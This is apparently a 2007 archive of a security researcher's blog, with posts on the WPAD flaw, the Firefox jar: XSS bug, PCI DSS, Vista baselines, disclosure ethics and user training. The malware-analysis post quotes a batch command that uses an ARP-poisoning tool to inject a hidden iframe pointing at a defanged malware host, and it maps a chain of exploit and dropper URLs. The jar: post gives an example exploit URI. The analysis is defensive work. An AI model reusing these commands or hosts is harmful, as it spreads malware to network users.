November 2007

but “L O L” at Microsofts latest security debacle

I think their own advisory from 1999 (!!!) explains the issue pretty well:

The IE 5 Web Proxy Auto-Discovery (WPAD) feature enables web clients to automatically detect proxy settings without user intervention. The algorithm used by WPAD prepends the hostname “wpad” to the fully-qualified domain name and progressively removes subdomains until it either finds a WPAD server answering the domain name or reaches the third-level domain. For instance, web clients in the domain a.b.microsoft.com would query wpad.a.b.microsoft, wpad.b.microsoft.com, then wpad.microsoft.com. A vulnerability arises because in international usage, the third-level domain may not be trusted. A malicious user could set up a WPAD server and serve proxy configuration commands of his or her choice.

Well,

too bad they only protected their customers from this if their domains ended in .com, and that this issue has persisted through eight more years of code (how much new code did they say there were in Vista?). This little function seems to have remained unchanged for almost a decade anyhow…

Now let’s hope that Microsoft are faster than the bad guys… And in the meantime:

• If you have a webfilter, block all adresses containing “wpad.” in them.
• On most Windows operating systems, stopping the service “WinHTTP Web Proxy Auto-Discovery Service” would also do it, but some people have been having problems with this.

In other words, keep an eye on your network the next couple of weeks until MS produces a patch.

Cheers and browse safe!

… by the bad guys unfortunately

When investigating one of the files that was being downloaded by the initial dropper from the Kirisun hack I found something very interesting. I do not know if this is a known technique, but it is new to me. The file I was looking at was the “24.exe” and the reason for choosing that one were:

1. Easy Self-extracting RAR, no encryption and no sandbox detection.
2. It was one of the largest files == lot’s of goodies?

After running the self-extracting RAR in the sandbox I ended up with the following files in c:\windows\system32\:

Inside the “drivers” folder a copy of npf.sys was dropped. This file belongs to the WinPcap project and so does some of the other files that were extracted.

The file that was supposed to auto start after decompression was “3.vbs” whose only job was to silently run “run.bat” which contained the following two lines:

Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert “<iframe src=’hxxp://5.xqhgm.com/2.htm’ width=20 height=1></iframe>”
Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert “<iframe src=’hxxp://5.xqhgm.com/2.htm’ width=20 height=1></iframe>”
exit

Ok, then what do our little friend Vml.exe do with these parameters I thought? After asking my friend Google I got the answer that I thought I would get, it was performing ARP poisoning on the local network (well, just the two subnets specified in the .bat) and inserting iframes into all websites being viewed. Previously discovered by CISRT earlier in November.

Genious! One point to the bad guys!

… and now have their pages full of malware infecting and object dumping <iframe>’s.

Tracking the iframe’s I found a series of different servers hosting the malware and exploits, the flow is as follows:

• hxxp://boc.sbb22.com/home/index.htm (This is the inserted Iframe)
  • hxxp://boc.sbb22.com/
    • hxxp://aa.llsging.com/ww/new82.htm
      • hxxp://aa.llsging.com/a2/haha.htm
      • hxxp://aa.llsging.com/a2/pps.htm
      • hxxp://js.users.51.la/1299644.js
        • hxxp://vip2.51.la/go.asp
      • hxxp://ww4.tongji123.com/g1.aspx?id=42916235
        • hxxp://ww4.tongji123.com/s.aspx
  • hxxp://nn.mm5208.com/nn.htm
    • Not reachable at the time
  • hxxp://xx.9365.org/
    • hxxp://5.xqhgm.com/sha1.htm
      • hxxp://5.xqhgm.com/new/1.gif (ANI exploit, loads on page).
        • Downloads and runs hxxp://1.xqhgm.com/x.exe
      • hxxp://5.xqhgm.com/new/1.htm (other exploit, not investigated)
        • References hxxp://1.xqhgm.com/x.exe
      • hxxp://5.xqhgm.com/new/2.htm
        • Not reachable at the time
      • hxxp://5.xqhgm.com/new/3.htm
        • Returns empty page
      • hxxp://5.xqhgm.com/new/4.htm
        • Tries to load hxxp://3.xqhgm.com/zs.exe as an object
      • hxxp://s30.cnzz.com/stat.php?id=658703&web_id=658703
        • Seems to be a statistics engine
      • hxxp://js.users.51.la/1402795.js
        • Not reachable at the time
  • hxxp://a.2008yi.com/hu.htm
    • Not reachable at the time
  • hxxp://acc.jqxx.org/ac.htm
    • hxxp://dfs.jfkdlirjnfirpocr.com/web/6619038.htm
      • Not reachable at the time

The primary payload of these iframed pages seems to be “x.exe” and “zs.exe”. When dumping the strings from these executables (no obfuscation used) it becomes apparent that both are droppers for a whole bunch of malware files (possibly the same files, just recompiled/packed/encrypted for AV evasion). The downloads referenced in the files were:

• hxxp://1.xqhgm.com/1.exe
• hxxp://1.xqhgm.com/2.exe
• hxxp://1.xqhgm.com/3.exe
• hxxp://1.xqhgm.com/4.exe
• and so on up to…
• hxxp://1.xqhgm.com/24.exe

File number “1″ and “16″ resulted in a 404 not found.

“23.exe” seems to be the same malware that I found some time back (see this post). As said in that post, the main infector do not want to run in my sandbox. As a cause of that I have not yet been able to get the pcihdd.sys rootkit component as I do not have a computer to “waste time restoring” atm. If someone would like to infect themselves, contact me for a sample

Another thing linking this infection to the other that I found is the use of the same stats engine, hxxp://s30.cnzz.com/.

Cheers and stay safe !

WARNING: PANDA SECURITY CENTRIC / ANGRY RANTING POST -> See “About this blog”.

Earlier on this month a potential “bug/security implication/design flaw/non-issue?” (the definition is not totally clear in this particular case) was reported to Panda Security by the security firm n.runs.

The issue at hand is that if a RAR-file header is formatted in a specific way, the contents of the archive cannot be analyzed by the antivirus kernel and as such might pass through perimeter defenses and actually be written to disk. Due to WinRar being extremely tolerant to illegally formatted archive headers (steganography someone?) this archive can still be opened with WinRar.

However, if the archive is extracted or if a file is run from it, Panda will have no problems catching it with either the signature based engine or the behavioural analysis engine. Of course there is also the possiblity of us not being able to detect the malware, but then why evade us? Our perimeter products would also catch these kinds of files if not reconfigured from default (content-filter->Files with inconsistent format, extension or MIME-type). However, if these settings have been changed, I see the attack vector more clearly. And of course, even if this is correctly configured it is not good that something possibly can slip by the signature engine.

This issue being reported is not a problem to us. It is a good thing and it enables us to provide better protection as we eliminate potential bypass vectors. What is a problem though (not only for us I think) is irresponsible disclosure. You can see Pedro’s thoughts about this here, but I’d like to share some of my own views as well.

As Pedro points out, most of the security problems reported to Panda by researchers or security companies are handled seriously and in a timely manner. This was also the case this time. In return for the diligence in response time and issue resolution, we do expect the reporting party to follow common policies for public disclosure, especially if the discussion and investigation of the flaw is still in the lab. This is for several reasons including (but not limited to) the security of our customers, the security of our customers (yeah, I wrote that twice), the continued cooperation with the security community in these issues and the open communication style used in these cases.

What n.runs did next while this issue was being investigated and its impact clarified was to publicly disclose the issue complete with technical details. As pointed out in this post by Kurt Wismer there are other issues with the document, but I’ll try to stay out of that discussion. I do however recommend reading his post as he is making some very good points not only in the article but also in the comments that followed.

The timeline for this issue was described in the Panda Research blog as:

Nov. 6: n.runs initial vulnerability report and PoC to Panda
Nov. 7: Panda acknowledges receipt and starts investigating
Nov. 13: n.runs publicly discloses Panda as vulnerable
Nov. 16: Panda sends comments on vulnerability and PoC to n.runs
Nov. 16: n.runs responds to Panda comments (fails to mention the issue is already public)
Nov. 21: Panda sends final response to n.runs

I understand that if you do not have a final response from the vendor in a reasonable time (that not being less than two month’s if initial contact is established), you might want to release an advisory or two highlighting the issues to pressure the vendor to provide a fix, but come on. That was surely not the case here.

Anyways, after seeing this behaviour I can’t help but wonder what motivated this line in their presentation referenced above:

“The solution developed by n.runs under the code name “ParsingSafe” will build on and work together with the customer antivirus products that are already in place or that are planned to be put in place ….. Based on this, the antivirus vendors are very important technology partners for our solution. The goal of the customer is still primarily to have the highest rate of virus recognition possible …..”

Could someone please explain to me how prematurely disclosing an issue like this can help our customers have “the highest rate of virus recognition possible” because I do not get it. Of course, the statement was regarding the goal of the customer. Not n.runs.

Whatever, my own opinions are probably just being clouded by me working with security professionally for such a long time. I remember back in the days when I was a kid and me and my “31337 h4×0rcr3w” threw out our newfound vulnerabilities as soon as we even saw a wiff of them. That was fun

Point made. Have a nice night

After my post mentioning the PCI DSS I got some questions like “PCI D..what?” and “What is that anyways? I’ve heard of it but never read anything about it”. Well, after reading this, you people should feel a bit enlightened. Hopefully, CISSPs and similar will not find this as new information, but you might enjoy the refresher. So, read on folks, this is gonna be a (…another) long one.

PCI DSS stands for “Payment Card Industry Data Security Standard” and it was created by the larger players in the credit card business to ensure that those little 1’s and 0’s, that usually reside on your physical magnetic-strip card, does not end up in the hands of a criminal.The first version of the standard was developed and agreed upon in late 2004 and was (still is) intended to provide guidance for organizations that transfer, store or process credit card information in computer security related issues. The first standard was revised in 2006 to make it more up-to-date and more relevant to the current situation.The use of the word “Guidance” is used a bit freely in the description according to me, as if a requirement in the standard is not met by the merchant he might lose his right to handle the kind of data described in the standard, effectively shutting down their business (this is not a bad thing, btw).Before the PCI DSS was widely agreed upon, many of the CC companies had their own standards and recommendations regarding data security, such as: CISP/AIS (Visa), SDP (MasterCard), DSOP (AmEx), I&C (Discover) and DSP (JSB). The above mentioned was also the primary participants in the discussion that later led to the standard. Most of these financial actors still have their own security programs but they have aligned them so that they all have the same objective, help merchants become PCI DSS standard compliant.

The PCI Data Security Standard consists of 12 topics in 6 different categories. These are called “control objectives” and are:

• Build and maintain a Secure Network
  • Requirement 1: Install and maintain a firewall configuration to protect cardholder data
  • Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
• Protect Cardholder Data
  • Requirement 3: Protect stored cardholder data
  • Requirement 4: Encrypt transmission of cardholder data across open, public networks
• Maintain a Vulnerability Management Program
  • Requirement 5: Use and regularly update anti-virus software
  • Requirement 6: Develop and maintain secure systems and applications
• Implement Strong Access Control Measures
  • Requirement 7: Restrict access to cardholder data by business need-to-know
  • Requirement 8: Assign a unique ID to each person with computer access
  • Requirement 9: Restrict physical access to cardholder data
• Regularly Monitor and Test Networks
  • Requirement 10: Track and monitor all access to network resources and cardholder data
  • Requirement 11: Regularly test security systems and processes
• Maintain an Information Security Policy
  • Requirement 12: Maintain a policy that addresses information security

In order to verify whether or not the merchants/service providers are really compliant they have to undergo self-assessments, quarterly PCI Security Scans and possibly PCI Security Audits (Depending on the size and amount of sensitive information handled).

The PCI Security Scans are to be performed by a ASV (or, Approved Scanning Vendor) and is non-intrusive in their nature. This means that the scans should not interrupt day-to-day business or cause any damage to the systems evaluated. After one of these scans the ASV compiles a report detailing the different issues found, the associated risk (you will need a CISSP for this ) and also provide some guidance on how to remedy the issues. Every weakness found should also be categorised in a scale from one to five, five being worst case scenario. The PCI DSS considers level 3 to 5 as a failure to comply and a direct danger to cardholder data. This type of scans was the topic of discussion in the webinar that I based my previous related post on.

If you are a large merchant or service provider you might also be the subject of a PCI Security Audit which consists of a review of internal policies & documentation, internal penetration-testing & security evaluation and also interviews of selected personnel. This is done to actually verify that all guidelines in the PCI DSS has been implemented as they should.

One very interesting document regarding both types of audits was written in late 2006 by consultants from the German security company SRC. In that document (which contains a lot of good info) they listed the top 10 types of vulnerabilities found for both methods (internal/external). What’s very serious about the ones they listed are that they are very old. For example, I used one of them to compromise a network in 2002! This kind of vulnerability should not be present in any company that seriously tries to be secure. No matter the size. They are easily scanned for and can be exploited in under one minute. You can find the whole document here.

Other references on this subject:

PCI Security Standards

PCI Answers - This post was very interesting.

PCI Answers PCI Forum

PCI DSS News and Information

IT Governance PCI DSS information

Google…

That’s it for me now. If I’m mistaken about something or if someone has any questions please drop me a comment or an e-mail!

Cheers,

I’m not an advocate or fan of Microsofts technology, implementation of standards or politics. That’s for sure. However this is actually really interesting for us that are stuck in our corporate environment with Windows:

I was recently visiting a larger company in Sweden that is in the testing stage of a large deployment of Windows Vista. This deployment will be done on a pretty big userbase that has somewhat special security demands and for that reason they are following the SSLF (or SS-LF) baseline presented by Microsoft in the Windows Vista Security Guide. In that same guide you will also find information about a lighter security model called Enterprise Client (EC). The EC-baseline provides a more simple and less intrusive security baseline but it did not fill the requirements for this particular company.

I was quite impressed with the work they had done and how well it seems to have fallen out and decided to read up on these baselines. I mean, more security for Windows systems is not a bad thing and if you can do this easily then it would be great.

The definition of the two baselines in the Windows Vista Security Guide are:

• Enterprise Client (EC). Client computers in this environment are located in a domain that uses Active Directory and only need to communicate with systems running Windows Server 2003. The client computers in this environment include a mixture: some run Windows Vista whereas others run Windows XP….
• Specialized Security – Limited Functionality (SSLF). Concern for security in this environment is so great that a significant loss of functionality and manageability is acceptable. For example, military and intelligence agency computers operate in this type of environment. The client computers in this environment run only Windows Vista…”

The whole process of securing the clients are done via Active Directory group policies and the implementation of these can be very much simplified by using pre-made scripts (also included in the security guide).

The main downside for me with this policy (SSLF) is that it might cause a minor conflict with the brand new “Panda For Desktops” (formerly known as ClientShield) but there is an easy remedy for that particular problem. Guess why I was there btw hehe…

Here is a short list of resources for more information:

• Windows Vista Security Guide - The whole guide, including everything.
• Lou Bolanis blog with links related to SSLF - More interesting links.
  
• Technet Security Guidance Center - Security information regarding all MS products.

And as a bonus, the delicious, the enormously useful (as not many run on an SSLF baseline) but also quite CTO friendly:

• Fundamental Computer Investigation Guide for Windows

This should be an prerequisite for all administrators running a +100 user network. Sure would make my life a hell of a lot easier during intrusion investigations

Cheers and drive safe (winter in Sweden now) !

Bruce Schneier on one of the “Deterministic Random Bit Generators” supplied by the U.S. government:

“But today there’s an even bigger stink brewing around Dual_EC_DRBG. In an informal presentation (.pdf) at the CRYPTO 2007 conference in August, Dan Shumow and Niels Ferguson showed that the algorithm contains a weakness that can only be described a backdoor.”

To copy common phrasing of the author himself, This is a big deal.

Find the whole article here.

 

For those of you that has not been following the computer security news and blogs there is a new vulnerability in town, and it’s nasty.

The problem lies in the jar: protocol implementation used by Firefox and it enables an attacker to conduct XSS and gives them almost limitless possibilitys for malware hosting.

This is an example URI which exploits the issue:

jar:http://www.icmpecho.com/myjarshrine/yarihooo.jpg!/malwareloadingscript.html

Now, instead of copying others work which they have probably spent hours or more on to explain the issue in full, I’ll give you a short recap of the happenings and more and more exposing blog posts:

---

2007-02-08 - Jesse Ruderman logs the bug in the Mozilla bugzilla tracker. It remains unpatched and not widely known until…2007-11-07 - Researcher pdp discusses the issue and potential impact at GNUCitizen. This opens this bug up to a whole new audience and…2007-11-10 - Beford illustrates the seriousness of this issue and issues in the same family by targeting Google and Gmail and posts a new bug entry.2007-11-10 - And then Mario posts at GNUCitizen about other attack vectors including malware- and exploit-hosting.

---

During these last days we have also seen some very strange recommendations from leading scurity experts at ZDNet, Secunia and US Cert (and one at The register as well) as the most excellent Giorgio over at the Hackademix blog.

The problems with the recommendations given by these persons and/or organisations is mainly that the recommend blocking URI’s containing JAR: in webfilters and deep packet inspecting firewalls or avoid following “jar:” links.You should understand why this would be a total waste of time if you have read the above articles and in particular Giorgio’s comments on the issue.

Also you should know why if you have seen one page load another like in most web based exploits (Including the one on the Swedish Parliament’s websites this week (swedish link, sorry)). My feeling is that the first advisories were rushed out “to be first in the corporate sector” and sloppy research took its toll.

If you do want to protect yourselves for real, you might wanna download and install the NoScript extension to Firefox which also handles JAR.

Happy times!

Last week I held and on-demand seminar out at a company in Stockholm, Sweden.

This is my retelling of that seminar and I wrote this down mostly for my own sake, for learning and seeing the areas in which I had to improve in order to be more clear to non-technical people that is on the other end of my message being transmitted.

The CTO of the company had asked us to help him educate his users on their responsibilities when it comes to keeping a network secure, and what potential harm they could cause themselves and the company if not doing so.

This is the neverending problem. Educating users. So how did I go about re-inventing the wheel?
I started out by presenting six simple questions and statements:

• Do you think that the information in your home computer is valuable?
• Do you think that your home computer is adequately protected from viruses and other kinds of malware?
• Do you think that the information in your work computer is valuable?
• Do you think that your work computer is adequately protected from viruses and other kinds of malware?
• Is the statement “There is less malware today than two years ago” true or false?
• Is the statement “There is less risk for getting infected now than two years ago” true or false?

I asked the participants to consider the questions and statements and keep their answers in their head. Of course, they might have understood that a person from an anti-malware vendor might have a hidden agenda in these questions

After this I presented some of the results from an internal study that concludes that most users of our anti-malware solutions think that the two last statements are true. That is, they think that there are less malware in the world and that there is less risk to get infected now than two years ago.

I then continued on to talk on how this is fundamentaly wrong and backed that up with the statistics from PandaLabs and the recent “InfectedOrNot”-survey of home users computers. I did not mention the corporate study, but if you are interested you can find both of these at Panda Security’s Research blog.

This study (of home users) are based on 1,5 million PC’s that were scanned with the online service www.infectedornot.com between May and July 2007. Among other things it concludes that out of all scanned computers with running and up-to-date antiviruses, almost 23% have active malware on their system. That is almost 1 in 4.

Why is this? Well, one thing that is largely responsible for this situation is the change of objective and goal of the malware today. Just a couple of years ago there were no banking or creditcard logging trojans, no spam-enabling botnets etc. Back then it was all about fame for the author, and that made it very easy for us antivirus guys. Today we are seeing a lot of new malware pop-up and a large amount of these are created with only one goal in mind, and that is financial gain for the creators. And as we all know, where there is money coming in there is money spent and what we are seeing today are professional malware writers making a business out of it. They have business plans and a whole development cycles and spends a lot of resources on pumping out variations on their goods to avoid the anti-malware radar. The “Storm worm” is a good and quite obvious example of this.
Of course this variation flood of the same malware creates a lot of strain on our (Panda Security’s) and other vendors virus-labs and forces us to either become selective, or to have a huge backlog of malware. Up until recently this was the situation for us.

We have had to adapt to this situation more and more during the last couple of years and we are finally catching up thanks to different things. First, we have increased the amount of automated processes and minimized the human factor in malware analysis and second we have created and implemented new technology that helps us to proactively detect and report potential threats (TruPrevent). Other new technology such as our “Collective Intelligence” also helps in detecting new malware family’s at an early stage.

Anyways, the end result of this massive onslaught of new modifications is that we (all security vendors) are bound to miss at least one which in many cases leads to a user being compromised in one way or another.

Now I turned the focus to where the real impact is and that is; Who is the Target and who is the Victim?

As the motivation behind the malware has changed, it is more than ever the actual user behind the keyboard that is the target. It is her information, her payment cards, her banking info and it is her computer that the malware authors want to use in DDoS attacks and other criminal activities.

This is very important for the average user to understand because if they do not, they will not think before they act and fall prey for the criminal gangs of the digital world (OMG, that sounded like a SecurityFocus line hehe).

OK, so what can the user do to secure his computer against these different kinds of threats? Well, as a start you (the user) should make sure that the following four bases are covered:

• Check that your computer is up to date
  • Windows Update
  • Secunia Personal Software Inspector (great tool)
• Check that you have an anti-malware solution installed
  • And turn on all protection modules, they are there for a reason
• Check that your anti-malware solution up to date
  • If it’s not, it is almost useless
• Check that you have a firewall installed
  • If not included in your anti-malware, use XP/Vista’s builtin firewall

However, as I mentioned in the start of this article, there will be things that can slip through. So what do we do next? How do we protect ourselves from threats that even the largest companies that offer protection cannot touch? Many times this is just a matter of:

Sound reason & Knowledge

I then continued on to illustrate what sound reason is when you browse the internet, use your e-mail and use community’s or instant messaging. In this section I talked about issues such as attached files or filetransfers from unknown users or senders, why you should not just click Yes/I Accept/Next without reading and seriously considering why you are asked. I also discussed the social issues and identity security issues posed by sites like MySpace and in particular Facebook. You know, the real essentials of this whole seminar. What you really really should not do when being asked to do something, to use your sound reason.

And then we have the “Knowledge” part. How do you teach a user to behave in a secure way and recognise indicators of foul-play in 10-15 minutes? Quite hard wouldn’t you say? I reasoned like this; Knowledge is part experience and part theory. If you have seen someone get their machine infected in some way or another then it is highly unlikely that you will repeat the same mistake (or… hopefully it’s “highly unlikely”). So I decided that the best way to learn users what to avoid was to actually show them some of the warnings they should pay special attention to and also demonstrate some social engineering tricks used by malware today.

One of those examples that worked the best was a login page for a large swedish bank which I had modified to “ring alarm bells” by faking an invalid SSL certificate. I then named that slide to “The internet banking service - Find the error”.

No one was able to spot the error.

And I was even using Vista which showed the whole adress bar in red with a big “Certificate Error”-shield at the end. Anyhow, I went on to tell them why this was a bad thing and from now on they are probably going to pay more attention to these kinds of errors.

Another example that seemed to make some people move around a bit in their chairs was the Storm worm’s halloween spreading mechanism with the dancing skeleton. Specially after I explained what storm was designed to be able to be used for (creditcard gathering, spam, ddos, well… everything). As I saw their reaction I even threw out an old classic a colleague of mine told me to say, “They can even turn on your webcam and see what you do in the room”. Heh.. yeah.. i know, a bit evil but it fit perfectly into my talk and they seemed to get the point now.

Now there was not very much time left for me to spend so I finished of with a recap of the questions in the beginning and also took a short slide on the corporate aspects. If they as private persons could suffer such financial loss and make it easier for others to conduct criminal activities, what could happen if their work-computers or computers that they connected to their workplace with got compromised? I asked them to consider the following possible implications of this kind of intrusion:

• Money. Large amounts of money. Either through direct loss or industrial espionage.
• Money. In the form of work-hours needed to clean up a widescale infection (including specialist help)
• Brand and Reputation. The damage caused by their network spreading malicious software or distributing confidential client information.
• Their personal freedom as in the restrictions put on their browsing, messaging and other aspects. Probably there is some checks on this today, but how will that change after an intrusion? Upper-management will want to restrict as much as possible to prevent this from happening again.

Yes, I know the last one is kind of a moot-point (as everything should already be locked down) but I needed to give them a personal connection to the trouble that could be caused, and -oh my god- if they cannot access their hotmail one day

And then i finished of with the “The End - Questions?” slide and took some of them. What was interesting about the questions was that a lot of them was regarding the Codec-fakes that I had discussed in my “Sound Reason” section. I did not expect this to be as prominent as most issues we recieve through the supportline with infections has entered through the web-browser with the help of security vulnerability’s or other means, we almost never hear anything about the fake codec angle (good thing?/bad thing? :)). But I guess that Sunbelt Software is really doing a good thing drumming on about the sites that are advertising those.

Ok, that was it. I would really like any comments that you might have, so please drop me a line at: daniel(dot)nystrom ( a ) icmpecho(dot)com!

I downloaded and listened in on the web application security talk that Jeremiah Grossman (WhiteHat Security (coordinators of the talk), Robert “RSnake” Hansen (SecTheory), Chris Paggen (Cisco) and Jordan Wiens (Network Computing) had. This was an unscripted roundtable discussion and it was very interesting to me, as I’m not so skilled in the areas that they discussed (getting there, more on that in later posts). Full info on the talk can be found at:

http://jeremiahgrossman.blogspot.com/2007/11/live-online-roundtable-episode-1.html

For me, the part of the talk dealing with WAF’s (web application firewalls) and normalization of input was quite interesting. As discussed, there really is no good way to do it if the customer or developer do not know they way his server and webapps handles input (and output for that matter) and which features are needed. However, if there is good documentation of the webapp that is to be protected, you might get away with some normalization (and then why not do it). WAF’s in general is not something you “just plug in” and some more fine tuning will most likely be needed if normalization is something that you want to do.

Another thing that i thought was actually more interesting, was hearing these people that are specialists on web security discuss the PCI DSS and what their experience and comments on it were.

One good thing with the PCI DSS is that for an CTO/Administrator/Security engineer that is really dedicated to providing good security for his company and it’s clients, the standard can be used to push up security budgets and raise awareness in upper-management. However, the money will also have to be well spent, and that’s where some of the participants see a problem.

That problem is that companys and departments with dedicated budgets will try to hold down costs, sometimes even if they have the money needed for a thorough security solution, all for increased profit. This in turn might lead them to cheaper and less reliable certified scanners and vulnerability testers, that might not find holes where there actually are plenty. What does this lead to? Well, not much for those trying to fill the PCI’s requirements, as they will still pass (AND with no problems detected, wohooo). The cost, as usual, ends up with the customer that gets his or hers creditcard-data stolen from the site.

An update on this were posted by RSnake (one of the participants) on the 11/11-07.

Another topic regarding the PCI DSS that was discussed was it’s unclarity in certain paragraphs that might lead to total or partial circumvention of the upholding of the standard. No comments regarding this but it does indeed sound pretty serious if that’s the case

More information on the PCI DSS here. And I also recommend you all to visit the link in the top of this post and listen to the whole webinar.

Cheers,